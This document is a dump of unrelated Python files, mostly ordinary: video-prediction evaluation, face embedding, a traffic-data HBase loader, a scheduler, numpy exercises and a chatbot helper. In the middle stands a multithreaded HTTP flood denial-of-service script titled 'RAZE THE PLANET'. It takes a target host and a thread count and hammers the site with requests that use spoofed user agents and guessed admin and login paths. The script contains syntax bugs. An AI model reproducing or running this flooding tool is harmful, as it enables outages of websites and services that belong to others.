                end = min(end, max(start + 1, start + (gif_per_vid - 1) * n_skip + 1))
            for j in xrange(start, end, n_skip):
                print("Video " + str(i) + "/" + str(len(testfiles)) + ". Index " + str(j) +
                      "/" + str(vid.get_length() - length - 1))
                folder_pref = vid_path.split("/")[-1].split(".")[0]
                folder_name = folder_pref + "." + str(j) + "-" + str(j + T)
                vid_names.append(folder_name)
                savedir = "../../results/images/KTH/" + prefix + "/" + folder_name
                seq_batch = np.zeros((1, image_size_h, image_size_w,
                                      length, c_dim), dtype="float32")
                for t in xrange(length):
                    # imageio fails randomly sometimes
                    while True:
                        try:
                            img = cv2.resize(vid.get_data(j + t), (image_size_h, image_size_w))
                            break
                        except Exception:
                            print("imageio failed loading frames, retrying")
                    img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
                    seq_batch[0, :, :, t] = transform(img[:, :, None])
                true_data = seq_batch.copy()
                pred_data = np.zeros(true_data.shape, dtype="float32")
                # Blank out the frames the model must synthesize.
                seq_batch_tran = create_missing_frames(seq_batch.transpose([0, 3, 1, 2, 4]), K, T)
                forward_seq = seq_batch_tran
                # Only the last convlstm layer contributes at test time.
                conv_layer_weight = np.zeros((convlstm_layer_num), dtype=np.float)
                conv_layer_weight[-1] = 1
                pred_data[0] = sess.run(model.G,
                                        feed_dict={model.forward_seq: forward_seq,
                                                   model.target: seq_batch,
                                                   model.conv_layer_weight: conv_layer_weight,
                                                   model.conv_layer_index: convlstm_layer_num - 1,
                                                   model.loss_reduce_weight: conv_layer_weight[convlstm_layer_num - 1],
                                                   model.is_dis: False,
                                                   model.is_gen: False})
                if not os.path.exists(savedir):
                    os.makedirs(savedir)
                cpsnr = np.zeros((length,))
                cssim = np.zeros((length,))
                for t in xrange(length):
                    pred = (inverse_transform(pred_data[0, :, :, t]) * 255).astype("uint8")
                    target = (inverse_transform(true_data[0, :, :, t]) * 255).astype("uint8")
                    if quantitative:
                        cpsnr[t] = measure.compare_psnr(pred, target)
                        cssim[t] = ssim.compute_ssim(Image.fromarray(cv2.cvtColor(target,
                                                                                  cv2.COLOR_GRAY2BGR)),
                                                     Image.fromarray(cv2.cvtColor(pred,
                                                                                  cv2.COLOR_GRAY2BGR)))
                    # pred = draw_frame(cv2.cvtColor(pred,cv2.COLOR_GRAY2BGR), t % (T + K) < K)
                    if qualitative:
                        blank = (inverse_transform(seq_batch_tran[0, t, :, :]) * 255).astype("uint8")
                        cv2.imwrite(savedir + "/pred_" + "{0:04d}".format(t) + ".png", pred)
                        cv2.imwrite(savedir + "/gt_" + "{0:04d}".format(t) + ".png", target)
                        cv2.imwrite(savedir + "/blk_gt_" + "{0:04d}".format(t) + ".png", blank)
                if qualitative:
                    # Assemble pred/gt/blanked-gt gifs with ffmpeg, then drop the pngs.
                    cmd1 = "rm " + savedir + "/pred.gif"
                    cmd2 = ("ffmpeg -f image2 -framerate 7 -i " + savedir +
                            "/pred_%04d.png " + savedir + "/pred.gif")
                    cmd3 = "rm " + savedir + "/pred*.png"
                    # Comment out "system(cmd3)" if you want to keep the output images
                    # Otherwise only the gifs will be kept
                    system(cmd1);
                    system(cmd2); system(cmd3);
                    cmd1 = "rm " + savedir + "/gt.gif"
                    cmd2 = ("ffmpeg -f image2 -framerate 7 -i " + savedir +
                            "/gt_%04d.png " + savedir + "/gt.gif")
                    cmd3 = "rm " + savedir + "/gt*.png"
                    # Comment out "system(cmd3)" if you want to keep the output images
                    # Otherwise only the gifs will be kept
                    system(cmd1);
                    system(cmd2); system(cmd3);
                    cmd1 = "rm " + savedir + "/blk_gt.gif"
                    cmd2 = ("ffmpeg -f image2 -framerate 7 -i " + savedir +
                            "/blk_gt_%04d.png " + savedir + "/blk_gt.gif")
                    cmd3 = "rm " + savedir + "/blk_gt*.png"
                    system(cmd1);
                    system(cmd2); system(cmd3);
                if quantitative:
                    print psnr_err.shape, cpsnr.shape
                    print ssim_err.shape, cssim.shape
                    psnr_err = np.concatenate((psnr_err, cpsnr[None,:]), axis=0)
                    ssim_err = np.concatenate((ssim_err, cssim[None,:]), axis=0)
        if quantitative:
            np.savez(save_path, psnr=psnr_err, ssim=ssim_err)
            print("Results saved to " + save_path)
            print "PSNR average:", np.mean(psnr_err), "SSIM average", np.mean(ssim_err)
    print("Done.")
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--lr", type=float, dest="lr",
default=0.0001, help="Base Learning Rate")
parser.add_argument("--batch_size", type=int, dest="batch_size",
default=8, help="Mini-batch size")
parser.add_argument("--alpha", type=float, dest="alpha",
default=1.0, help="Image loss weight")
parser.add_argument("--beta", type=float, dest="beta",
default=0.02, help="GAN loss weight")
parser.add_argument("--image_size_h", type=int, dest="image_size_h",
default=128, help="Mini-batch size")
parser.add_argument("--image_size_w", type=int, dest="image_size_w",
default=128, help="Mini-batch size")
parser.add_argument("--K", type=int, dest="K",
default=1, help="Number of frames of gt per block")
parser.add_argument("--T", type=int, dest="T",
default=3, help="Number of frames synthesized per block")
parser.add_argument("--B", type=int, dest="B",
default=5, help="number of blocks")
parser.add_argument("--convlstm_layer_num", type=int, dest="convlstm_layer_num",
default=2, help="number of convlstm layers")
parser.add_argument("--num_iter", type=int, dest="num_iter",
default=100000, help="Number of iterations")
parser.add_argument("--gpu", type=int, nargs="+", dest="gpu", default=0,
help="GPU device id")
parser.add_argument("--cpu", action="store_true", dest="cpu", help="use cpu only")
parser.add_argument("--Unet", action="store_true", dest="Unet", help="use Unet")
parser.add_argument("--load_pretrain", action="store_true", dest="load_pretrain", help="load_pretrain")
parser.add_argument("--tf_record_train_dir", type=str, nargs="?", dest="tf_record_train_dir",
default="../../../tf_record/KTH/train/", help="tf_record train location")
parser.add_argument("--tf_record_test_dir", type=str, nargs="?", dest="tf_record_test_dir",
default="../../../tf_record/KTH/test/", help="tf_record test location")
parser.add_argument("--color_channel_num", type=int, dest="color_channel_num",
default=1, help="number of color channels")
parser.add_argument("--dec", type=str, dest="dec", default="deconv",
help="deconv or depool")
parser.add_argument("--dyn_enc_model", type=str, dest="dyn_enc_model", default="mix",
help="dynamic encoding model")
parser.add_argument("--reference_mode", type=str, dest="reference_mode", default="two",
help="refer to how many frames in the end")
parser.add_argument("--debug", action="store_true", dest="debug", help="debug mode")
parser.add_argument("--no_d", action="store_true", dest="no_d", help="debug mode")
parser.add_argument("--fade_in", action="store_true", dest="fade_in", help="fade_in")
parser.add_argument("--use_gt", action="store_true", dest="use_gt", help="use_gt")
parser.add_argument("--no_store", action="store_true", dest="no_store", help="no_store")
# one, mix, or close(not recommend)
parser.add_argument("--res_mode", type=str, default="mix", dest="res_mode", help="res_mode")
parser.add_argument("--pixel_loss", type=str, default="l2", dest="pixel_loss", help="pixel_loss")
parser.add_argument("--print_train_instead", action="store_true",
dest="print_train_instead", help="print_train_instead of test")
parser.add_argument("--dis_length", type=int, dest="dis_length",
default=11, help="number frames to be sent in discriminator")
parser.add_argument("--pretrain_model", type=str, dest="pretrain_model",
default="", help="")
parser.add_argument("--concatconv", action="store_true", dest="concatconv", help="concatconv")
parser.add_argument("--gif_per_vid", type=int, dest="gif_per_vid", default=1,
help="refer to how many per video")
parser.add_argument("--mode", type=str, dest="mode",
default="bi_one_serial", help="number frames to be sent in discriminator")
parser.add_argument("--quantitative", action="store_true", dest="quantitative", help="quantitative")
parser.add_argument("--qualitative", action="store_true", dest="qualitative", help="qualitative")
args = parser.parse_args()
# from tensorflow.python.tools.inspect_checkpoint import print_tensors_in_checkpoint_file
# print_tensors_in_checkpoint_file(
# file_name='../../models/KTH/KTH_convlstm_image_size_h=128_image_size_w=128_K=1_T=3_B=5_convlstm_layer_num=2_dis_length=11_batch_size=16_alpha=1.0_beta=0.02_lr=0.0001_mode=bi_one_serial_fade_in=False_no_d=True_use_gt=True_res_mode=mix_pixel_loss=l2_concatconv=True_Unet=True/bi_conv_lstm.model-100001',
# tensor_name='', all_tensors=False)
# exit()
main(**vars(args))
|
from tkinter import *
from tkinter.ttk import *
import os
from tkinter import filedialog
from tkinter import messagebox
# Build the picker window: white 800x480 root with an instruction label.
root=Tk()
root.config(bg="white")
root.geometry("800x480")
root.title("Add Image")
Label(root,text="Pick the Image location from the disk:",font=("Verdana",15),background="white").pack()
def loc():
    """Ask the user for a PNG, then append code that displays it to the
    generated ``product.py`` (the target widget's variable name is read
    from ``temp.txt``).
    """
    limage=filedialog.askopenfilename(parent=root,title="Pick the image",filetypes=[('PNG file (*.png)', '*.png')])
    # Context managers guarantee both handles close even if a write fails
    # (the originals were closed manually and leaked on error).
    with open("temp.txt", 'r') as rootname, open("product.py", 'a+') as product:
        product.write("\nrimage=PhotoImage(file=\"" + limage + "\")")
        product.write("\nLabel(" + rootname.readline() + ",image=rimage).pack()")
    messagebox.showinfo("Succesful", "Image Added Successfully")
Button(root,text="Pick",command=loc).pack()
# Enter the Tk event loop; blocks until the window closes.
mainloop()
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from scipy import misc
import sys
import os
import argparse
import tensorflow as tf
import numpy as np
import mxnet as mx
import random
import sklearn
from sklearn.decomposition import PCA
from time import sleep
from easydict import EasyDict as edict
#import facenet
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'align'))
import detect_face
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import face_image
import face_preprocess
def ch_dev(arg_params, aux_params, ctx):
    """Copy every arg/aux NDArray onto ``ctx``; return the two new dicts."""
    new_args = {name: arr.as_in_context(ctx) for name, arr in arg_params.items()}
    new_auxs = {name: arr.as_in_context(ctx) for name, arr in aux_params.items()}
    return new_args, new_auxs
def do_flip(data):
    """Flip every image in ``data`` left-right, in place.

    ``data`` is indexed as (image, row, col) — presumably (N, H, W); the
    flip mirrors each image horizontally.
    """
    # BUG FIX: ``xrange`` is Python-2-only and breaks this module under
    # Python 3; ``range`` behaves identically here.
    for idx in range(data.shape[0]):
        data[idx,:,:] = np.fliplr(data[idx,:,:])
class FaceModel:
  def __init__(self, args):
    """Build the MTCNN face detector (TensorFlow) and load the embedding
    network checkpoint (MXNet) described by ``args``.

    args must provide: threshold, image_size ("h,w"), model ("prefix,epoch"),
    and gpu (device id).
    """
    model = edict()
    with tf.Graph().as_default():
      config = tf.ConfigProto()
      # Keep the detector's GPU footprint small; MXNet shares the device.
      config.gpu_options.per_process_gpu_memory_fraction = 0.2
      sess = tf.Session(config=config)
      #sess = tf.Session()
      with sess.as_default():
        self.pnet, self.rnet, self.onet = detect_face.create_mtcnn(sess, None)
    # Detection hyper-parameters (min face size, per-stage thresholds, pyramid factor).
    self.threshold = args.threshold
    self.det_minsize = 50
    self.det_threshold = [0.4,0.6,0.6]
    self.det_factor = 0.9
    _vec = args.image_size.split(',')
    assert len(_vec)==2
    self.image_size = (int(_vec[0]), int(_vec[1]))
    # args.model is "<checkpoint-prefix>,<epoch>".
    _vec = args.model.split(',')
    assert len(_vec)==2
    prefix = _vec[0]
    epoch = int(_vec[1])
    print('loading',prefix, epoch)
    self.model = edict()
    self.model.ctx = mx.gpu(args.gpu)
    self.model.sym, self.model.arg_params, self.model.aux_params = mx.model.load_checkpoint(prefix, epoch)
    self.model.arg_params, self.model.aux_params = ch_dev(self.model.arg_params, self.model.aux_params, self.model.ctx)
    # Use the fc1 embedding output as the network head.
    all_layers = self.model.sym.get_internals()
    self.model.sym = all_layers['fc1_output']
def get_aligned_face(self, img, force = False):
#print('before det', img.shape)
bounding_boxes, points = detect_face.detect_face(img, self.det_minsize, self.pnet, self.rnet, self.onet, self.det_threshold, self.det_factor)
#if bounding_boxes.shape[0]==0:
# fimg = np.copy(img)
# do_flip(fimg)
# bounding_boxes, points = detect_face.detect_face(fimg, self.det_minsize, self.pnet, self.rnet, self.onet, self.det_threshold, self.det_factor)
if bounding_boxes.shape[0]==0 and force:
print('force det', img.shape)
bounding_boxes, points = detect_face.detect_face(img, self.det_minsize, self.pnet, self.rnet, self.onet, [0.3, 0.3, 0.1], self.det_factor)
#bounding_boxes, points = detect_face.detect_face_force(img, None, self.pnet, self.rnet, self.onet)
#print('after det')
if bounding_boxes.shape[0]==0:
return None
bindex = 0
nrof_faces = bounding_boxes.shape[0]
det = bounding_boxes[:,0:4]
img_size = np.asarray(img.shape)[0:2]
if nrof_faces>1:
bounding_box_size = (det[:,2]-det[:,0])*(det[:,3]-det[:,1])
img_center = img_size / 2
offsets = np.vstack([ (det[:,0]+det[:,2])/2-img_center[1], (det[:,1]+det[:,3])/2-img_center[0] ])
offset_dist_squared = np.sum(np.power(offsets,2.0),0)
bindex = np.argmax(bounding_box_size-offset_dist_squared*2.0) # some extra weight on the centering
det = bounding_boxes[:,0:4]
det = det[bindex,:]
points = points[:, bindex]
landmark = points.reshape((2,5)).T
#points need to be transpose, points = points.reshape( (5,2) ).transpose()
det = np.squeeze(det)
bb = det
points = list(points.flatten())
assert(len(points)==10)
str_image_size = "%d,%d"%(self.image_size[0], self.image_size[1])
warped = face_preprocess.preprocess(img, bbox=bb, landmark = landmark, image_size=str_image_size)
warped = np.transpose(warped, (2,0,1))
print(warped.shape)
return warped
def get_all_faces(self, img):
str_image_size = "%d,%d"%(self.image_size[0], self.image_size[1])
bounding_boxes, points = detect_face.detect_face(img, self.det_minsize, self.pnet, self.rnet, self.onet, self.det_threshold, self.det_factor)
ret = []
for i in xrange(bounding_boxes.shape[0]):
bbox = bounding_boxes[i,0:4]
landmark = points[:, i].reshape((2,5)).T
aligned = face_preprocess.preprocess(img, bbox=bbox, landmark = landmark, image_size=str_image_size)
aligned = np.transpose(aligned, (2,0,1))
ret.append(aligned)
return ret
def get_feature_impl(self, face_img, norm):
embedding = None
for flipid in [0,1]:
_img = np.copy(face_img)
if flipid==1:
do_flip(_img)
#nimg = np.zeros(_img.shape, dtype=np.float32)
#nimg[:,ppatch[1]:ppatch[3],ppatch[0]:ppatch[2]] = _img[:, ppatch[1]:ppatch[3], ppatch[0]:ppatch[2]]
#_img = nimg
input_blob = np.expand_dims(_img, axis=0)
self.model.arg_params["data"] = mx.nd.array(input_blob, self.model.ctx)
self.model.arg_params["softmax_label"] = mx.nd.empty((1,), self.model.ctx)
exe = self.model.sym.bind(self.model.ctx, self.model.arg_params ,args_grad=None, grad_req="null", aux_states=self.model.aux_params)
exe.forward(is_train=False)
_embedding = exe.outputs[0].asnumpy()
#print(_embedding.shape)
if embedding is None:
embedding = _embedding
else:
embedding += _embedding
if norm:
embedding = sklearn.preprocessing.normalize(embedding)
return embedding
def get_feature(self, face_img, norm=True):
#aligned_face = self.get_aligned_face(img, force)
#if aligned_face is None:
# return None
return self.get_feature_impl(face_img, norm)
def is_same_id(self, source_img, target_img_list):
source_face = self.get_aligned_face(source_img, True)
print('source face', source_face.shape)
target_face_list = []
pp = 0
for img in target_img_list:
target_force = False
if pp==len(target_img_list)-1 and len(target_face_list)==0:
target_force = True
target_face = self.get_aligned_face(img, target_force)
if target_face is not None:
target_face_list.append(target_face)
pp+=1
print('target face', len(target_face_list))
source_feature = self.get_feature(source_face, True)
target_feature = None
for target_face in target_face_list:
_feature = self.get_feature(target_face, False)
if target_feature is None:
target_feature = _feature
else:
target_feature += _feature
target_feature = sklearn.preprocessing.normalize(target_feature)
#sim = np.dot(source_feature, target_feature.T)
diff = np.subtract(source_feature, target_feature)
dist = np.sum(np.square(diff),1)
print('dist', dist)
#print(sim, dist)
if dist<=self.threshold:
return True
else:
return False
def sim(self, source_img, target_img_list):
print('sim start')
source_face = self.get_aligned_face(source_img, True)
print('source face', source_face.shape)
target_face_list = []
pp = 0
for img in target_img_list:
target_force = False
if pp==len(target_img_list)-1 and len(target_face_list)==0:
target_force = True
target_face = self.get_aligned_face(img, target_force)
if target_face is not None:
target_face_list.append(target_face)
pp+=1
print('target face', len(target_face_list))
source_feature = self.get_feature(source_face, True)
target_feature = None
sim_list = []
for target_face in target_face_list:
_feature = self.get_feature(target_face, True)
_sim = np.dot(source_feature, _feature.T)
sim_list.append(_sim)
return np.max(sim_list)
|
import requests
import threading
import socket
import time
import random
import sys
global target
global server_block
global end_
end_ = False #method to stop threads
def load_pix():
from colorama import init
init()
from colorama import Fore, Back, Style
print(Fore.GREEN + """
|||} || ||||||| ||||||||||
|| |} | | || ||
|| |} || || || ||
|||} |||||||| || ||||||||
||\\\ || || || ||
|| \\\ || || || ||
|| \\\ || || ||||||| ||||||||||
RAZE THE PLANET
---------------
Target = %s
Power = %s
""") % (target,power)
print(Style.RESET_ALL)
if len(sys.argv) == 3:
if sys.argv[1] is None:
print "No target specified"
exit()
else:
target=str(sys.argv[1])
#print ("Target = %s") % (target)
if sys.argv[2] is None:
print "No power specified"
exit()
else:
power=int(sys.argv[2])
#print ("Power = %s") % (power)
elif len(sys.argv) ==4:
if sys.argv[1] is None:
print "No target specified"
exit()
else:
target=str(sys.argv[1])
#print ("Target = %s") % (target)
if sys.argv[2] is None:
print "No power specified"
exit()
else:
power=int(sys.argv[2])
#print ("Power = %s") % (power)
if sys.argv[3] is None:
print "Invalid option"
exit()
elif sys.argv[3]=='-ad':
ad_da = True
else:
ad_da = False
else:
print "invalid argument size"
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def camo():
global adaptive_data
adaptive_data = []
adaptive_data.append("file")
adaptive_data.append("admin")
adaptive_data.append("login")
adaptive_data.append("help")
adaptive_data.append("info")
adaptive_data.append("about")
adaptive_data.append("logins")
adaptive_data.append("HELP")
adaptive_data.append("account")
adaptive_data.append("text")
adaptive_data.append("administrator")
adaptive_data.append("Url")
adaptive_data.append("Support")
adaptive_data.append("support")
adaptive_data.append("Admin")
adaptive_data.append("Contact")
adaptive_data.append("contact")
return adaptive_data
camo()
user_agent()
def test():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
global server_block
server_block = False
while True:
try:
s.connect((target,80))
time.sleep(5)
except:
server_block = True
break
def reg_attack():
while server_block == False and end_ == False:
try:
tar = ('http://%s') % (target)
req = requests.get(tar, headers=random.choice(uagent))
except KeyboardInterrupt:
print "Stopping attack"
break
def attack1():
while server_block == False and end_ == False:
try:
tar = ('http://%s/%s') % (target,random.choice(adaptive_data))
req = requests.get(tar, headers=random.choice(uagent))
except KeyboardInterrupt:
print "Stopping attack"
break
try:
test()
print "Started testing service"
if ad_da = True:
for i in range(0,power):
t = threading.Thread(target=attack1)
t.start()
print ("Started user %s") % (i+1)
else:
for i in range(0,power):
t = threading.Thread(target=reg_attack)
t.start()
print ("Started user %s") % (i+1)
except:
print "error!"
exit()
print "Attack is underway!"
def end_test():
try:
pass
except KeyboardInterrupt:
end_ = True
end_test()
|
### Parte de leer los datos de hdfs ###
# Reads one traffic-data XML snapshot from HDFS and extracts four global
# aggregates (vehicle counts and mean speeds) into module-level variables.
import pandas as pd
import numpy as np
import pydoop.hdfs as hd
from lxml import objectify

with hd.open("/user/datostrafico/20160526_1711.xml") as archivo:
    parsed = objectify.parse(archivo)
    DatosTrafico = parsed.getroot()

totalvehiculostunel = 0;
totalvehiculoscalle30 = 0;
velocidadmediatunel = 0;
velocidadmediasuperficie = 0;
iteraccion = 0
# Each <DatoGlobal> element carries a Nombre/VALOR pair; scan them all.
for row in DatosTrafico.DatoGlobal:
    if (row.Nombre == 'totalVehiculosTunel'):
        totalvehiculostunel = row.VALOR
    if (row.Nombre == 'totalVehiculosCalle30'):
        totalvehiculoscalle30 = row.VALOR
    if (row.Nombre == 'velocidadMediaTunel'):
        velocidadmediatunel = row.VALOR
    # NOTE(review): 'velicidadMediaSuperfice' looks misspelled — presumably it
    # matches the producer's actual field name; verify against the source XML.
    if (row.Nombre == 'velicidadMediaSuperfice'):
        velocidadmediasuperficie = row.VALOR
    iteraccion = iteraccion + 1

# Row layout consumed by insert_row() below.
fila = [str(totalvehiculostunel),str(totalvehiculoscalle30),str(velocidadmediasuperficie),str(velocidadmediatunel)]
### Parte de meter los datos en hbase con el conector ###
import csv
import happybase
import time
# Number of puts happybase buffers before flushing a batch to HBase.
batch_size = 1000
#host = "192.168.1.108"
host = 'localhost'
# HBase namespace, used as a table prefix ("calidadaire:<table>").
namespace = "calidadaire"
# NOTE(review): row_count and start_time are never used below — leftovers?
row_count = 0
start_time = time.time()
table_name = "medicion_trafico"
def connect_to_hbase():
    """Connect to the HBase server.

    Uses the module-level host, namespace, table name and batch size.

    Returns
    -------
    (connection, batch) — an open happybase Connection and a write batch
    bound to the configured table.
    """
    connection = happybase.Connection(host=host,
                                      table_prefix=namespace,
                                      table_prefix_separator=":")
    connection.open()
    hbase_table = connection.table(table_name)
    write_batch = hbase_table.batch(batch_size=batch_size)
    return connection, write_batch
def insert_row(batch, row, row_key="20160621"):
    """Insert a row into HBase.

    Write the row to the batch. When the batch size is reached, rows will be
    sent to the database.

    Parameters
    ----------
    batch : happybase batch-like object exposing put(row_key, data).
    row : sequence of 4 string values, in order:
        [ total_vehiculos_tunel, total_vehiculos_calle30,
          velocidad_media_superficie, velocidad_media_tunel ]
    row_key : str, optional
        HBase row key. Previously hard-coded to "20160621"; now a parameter
        (with the old value as default) so callers can supply the actual
        measurement date.
    """
    batch.put(row_key, {"total_vehiculos_tunel:0": row[0],
                        "total_vehiculos_calle30:0": row[1],
                        "velocidad_media_superficie:0": row[2],
                        "velocidad_media_tunel:0": row[3]})
# After everything has been defined, run the script.
conn, batch = connect_to_hbase()
# print "Connect to HBase. table name: %s, batch size: %i" % (table_name, batch_size)
try:
    # `fila` was built by the HDFS/XML section above.
    insert_row(batch, fila)
    # Force the (possibly partial) batch out to the server.
    batch.send()
finally:
    # No matter what happens, close the file handle.
    conn.close()
|
# coding=utf-8
from AutoInstall import *
from threading import Thread
from Manage import JobsManage
import HttpAPI
from apscheduler.schedulers.blocking import BlockingScheduler
from apscheduler.triggers import interval
from config import log_File, PLUGIN, base_leve, HTTP
from BaseMetric import collect
from Repo import report
# Blocking scheduler that runs all of the agent's periodic jobs.
Jobs = BlockingScheduler()
# Dedicated logger for the job scheduler: file handler only, no propagation
# to the root logger.
thread_log = logging.getLogger(u'计划任务调度器')
thread_log.setLevel(base_leve)
thread_log.propagate = False
thread_log.addHandler(log_File)
# thread_log.addHandler(console)
# Discover and register the configured plugin jobs.
Plugins = JobsManage(PLUGIN)
Plugins.make_jobs()
@Jobs.scheduled_job(trigger='interval', id='UpdataThread', minutes=5)
def UpdataThread():
    """Self-update job, runs every 5 minutes.

    Compares the local md5.txt with the server's copy; when they differ,
    downloads and installs the update in a background daemon thread.
    """
    ins = Upgrade()
    try:
        server_md5 = ins.Remote_Md5()
        file_md5 = ins.File_Md5()
        if file_md5 == server_md5:
            return thread_log.info(u"Md5验证通过,跳过更新! ")
    except urllib2.HTTPError:
        thread_log.error(u"无法连接到: %s" % ins.AgentMd5)
        # BUGFIX: previously execution fell through and started the download
        # thread with server_md5 = None; bail out when the server is
        # unreachable instead.
        return
    t = Thread(target=ins.Download_And_Install, args=(server_md5,), name=u'更新线程')
    thread_log.info(u'%s--%s' % (t.name, t.ident))
    t.daemon = True
    t.start()
def APIthread():
    """Start the HTTP API in a daemon thread so users can push data
    through the web interface.
    """
    ports = HTTP.get('listen')
    if not ports:
        # No usable port configured — refuse to start the API.
        return thread_log.error(u"端口错误,无法开启API传送数据!")
    api_thread = Thread(target=HttpAPI.app.run, kwargs=dict(port=ports), name=u'API接口线程')
    thread_log.info(u'%s--%s' % (api_thread.name, api_thread.ident))
    api_thread.daemon = True
    api_thread.start()
@Jobs.scheduled_job(trigger='interval', id='BaseMetric', minutes=1)
def BasePush():
    """Base-metric push job: once a minute, run collect() to gather metrics
    and submit them to the server.
    """
    try:
        collect()
    except Exception as err:
        # Never let a collection failure kill the scheduler; just log it.
        thread_log.error(err)
        return
@Jobs.scheduled_job(trigger='interval', id='HbsRepo', minutes=1)
def RepoPush():
    """HBS (heartbeat) push job: call report() once a minute."""
    return report()
|
import subprocess
from zombie.window_operation import Window
class Program:
    """Minimal wrapper for launching an external program."""

    def __init__(self, program_path):
        # Path (or argv list) in any form understood by subprocess.Popen.
        self.path = program_path

    def run(self):
        """Launch the program without waiting for it to finish.

        Returns
        -------
        subprocess.Popen
            The process handle, so callers can wait()/poll()/terminate().
            (Previously the handle was discarded; returning it is
            backward-compatible — old callers simply ignored None.)
        """
        return subprocess.Popen(self.path)
if __name__ == "__main__":
    # Demo: launch Windows Explorer, then list windows whose title matches
    # "Github" (Windows-only; depends on zombie.window_operation).
    pg = Program("explorer.exe")
    pg.run()
    mes_main_window = Window("Github")
    mes_main_window.list_all_windows(printout=True)
|
'''
Created on 2013-7-19

@author: Administrator
'''
# Python 2 script: deletes the user row with id 13 through the DAO layer,
# then prints the DAO's result value.
import framework.model.DAO as DAO;

dal = DAO.DAO();
#sql = "delete from user where id=13";
# Presumably equivalent to: DELETE FROM user WHERE id = 13 — TODO confirm
# against the DAO implementation.
result = dal.delete({'id':13});
print result
# !/usr/bin/python
# -*- coding:utf8 -*-
# __author__ = c08762
"""Learn numpy: array attributes, creation helpers and basic math."""
# Basic attributes (ndim / shape / size)
import numpy as np
# array = np.array([[1,2,3],[4,5,6]])
# print(array)
# print('number of dim:', array.ndim)
# print('shape:', array.shape)
# print('size:', array.size)
# Create arrays; dtype may be given explicitly (default is a 64-bit type).
a1 = np.array([2,3,4])
# BUGFIX: np.int was deprecated in NumPy 1.20 and removed in 1.24; the
# builtin int yields the same dtype.
a2 = np.array([[2,3,4],[5,6,7]], dtype=int)
# Pre-filled arrays
a3 = np.zeros((3,4))  # all zeros; the argument is the shape
a4 = np.ones((5,6), dtype=int)  # all ones
a5 = np.empty((2,2))  # uninitialized memory (arbitrary, near-zero values)
# Ordered sequences
a6 = np.arange(10,20)  # 1-D array 10..19; an optional step may be given
a7 = np.arange(12).reshape((3,4))  # reshape into the given shape
# Evenly spaced samples including both endpoints:
# spacing = (stop - start) / (n - 1)
a8 = np.linspace(1,51,6)
a9 = np.linspace(1,51,6).reshape((3,2))
# Random arrays
# BUGFIX: np.random.random_integers (inclusive bounds) was removed; randint
# uses a half-open interval, so the bound becomes 21 to keep values in 1..20.
a14 = np.random.randint(1,21,(3,2))
a15 = np.random.random((2,3))  # uniform [0,1); the argument is the shape
# print(a1)
# print(a2.dtype)
# print(a3)
# print(a4)
# print(a5)
# print(a6)
# print(a7)
# print(a8)
# print(a9)
# print(a14)
# print(a15)
# Arithmetic supported by numpy
a10 = np.array([10,20,30,40])
a11 = np.arange(4)
# print(a10+a11)  # +,-,*,/ operate elementwise
# print(a10-a11)
# print(a10*a11)
# print(a11/a10)
# print(a10*2)  # scalar multiply: applied to every element
# Comparisons return a boolean array
# print(a11,a11<3)
# Matrix multiplication
# a12 = np.array([[1,2,3],[4,5,6]])
# a13 = np.array([[1,2],[3,4],[5,6]])
# print(a12)
# print(a13)
# print(np.dot(a12,a13))  # equivalent to the expression below
# print(a12.dot(a13))
# print(np.sum(a15))  # sum over the whole array
# print(np.min(a15))  # minimum
# print(np.max(a15))  # maximum
# print(np.sum(a15,axis=1))  # axis=1: per-row sum / extremum
# print(np.min(a15,axis=0))  # axis=0: per-column sum / extremum
# print(np.argmin(a15))  # index of the minimum (flattened, base 0)
# print(np.argmax(a15))  # index of the maximum, base 0
# print(np.mean(a15))  # mean
# print(a15.mean())  # mean
# print(np.average(a15))  # mean
# print(np.median(a15))  # median
print(a2)
# print(np.cumsum(a2))  # cumulative sum
# print(np.diff(a2))  # differences between neighbours
# print(np.nonzero(a2))  # indices of the non-zero entries
# print(np.sort(a2))  # sorts each row
# print(np.transpose(a2))  # transpose
# print(a2.transpose())  # transpose
#print(a2.T)  # transpose
print(np.clip(a2,4,5))  # values < 4 become 4, values > 5 become 5
|
class ResponseGenerator:
    """Builds the response payload sent back to the chat client."""

    def __init__(self):
        pass

    @classmethod
    def make_response(cls, clientRequest, selectedTemplate, params=None, training=None):
        """Fill clientRequest['response'] from a response template.

        Parameters
        ----------
        clientRequest : dict with a 'response' sub-dict (mutated in place
            and also returned).
        selectedTemplate : dict with 'text' (a str.format template) and
            'options'.
        params : dict, optional — format arguments for the template text.
        training : dict, optional — stored on clientRequest['training'].
            BUGFIX: was a mutable default argument ({}) shared across calls;
            now None, with a fresh dict created per call.
        """
        print("* * * * * * * * * * * * * * ")
        print("# Make Response ")
        if params:
            clientRequest["response"]["responseText"] = selectedTemplate["text"].format(
                **params)
        else:
            clientRequest["response"]["responseText"] = selectedTemplate["text"]
        if clientRequest["response"].get("search"):
            # A pending search overrides the template's canned options.
            _options = get_options(clientRequest["response"]["search"])
            clientRequest["response"]["options"] = _options
        else:
            clientRequest["response"]["options"] = selectedTemplate["options"]
        clientRequest["training"] = {} if training is None else training
        return clientRequest

    @classmethod
    def send_home_response(cls, clientRequest, home_options):
        """Reset the response to the top-level 'home' menu."""
        print("* * * * * * * * * * * * * * ")
        print("# Make Home Response")
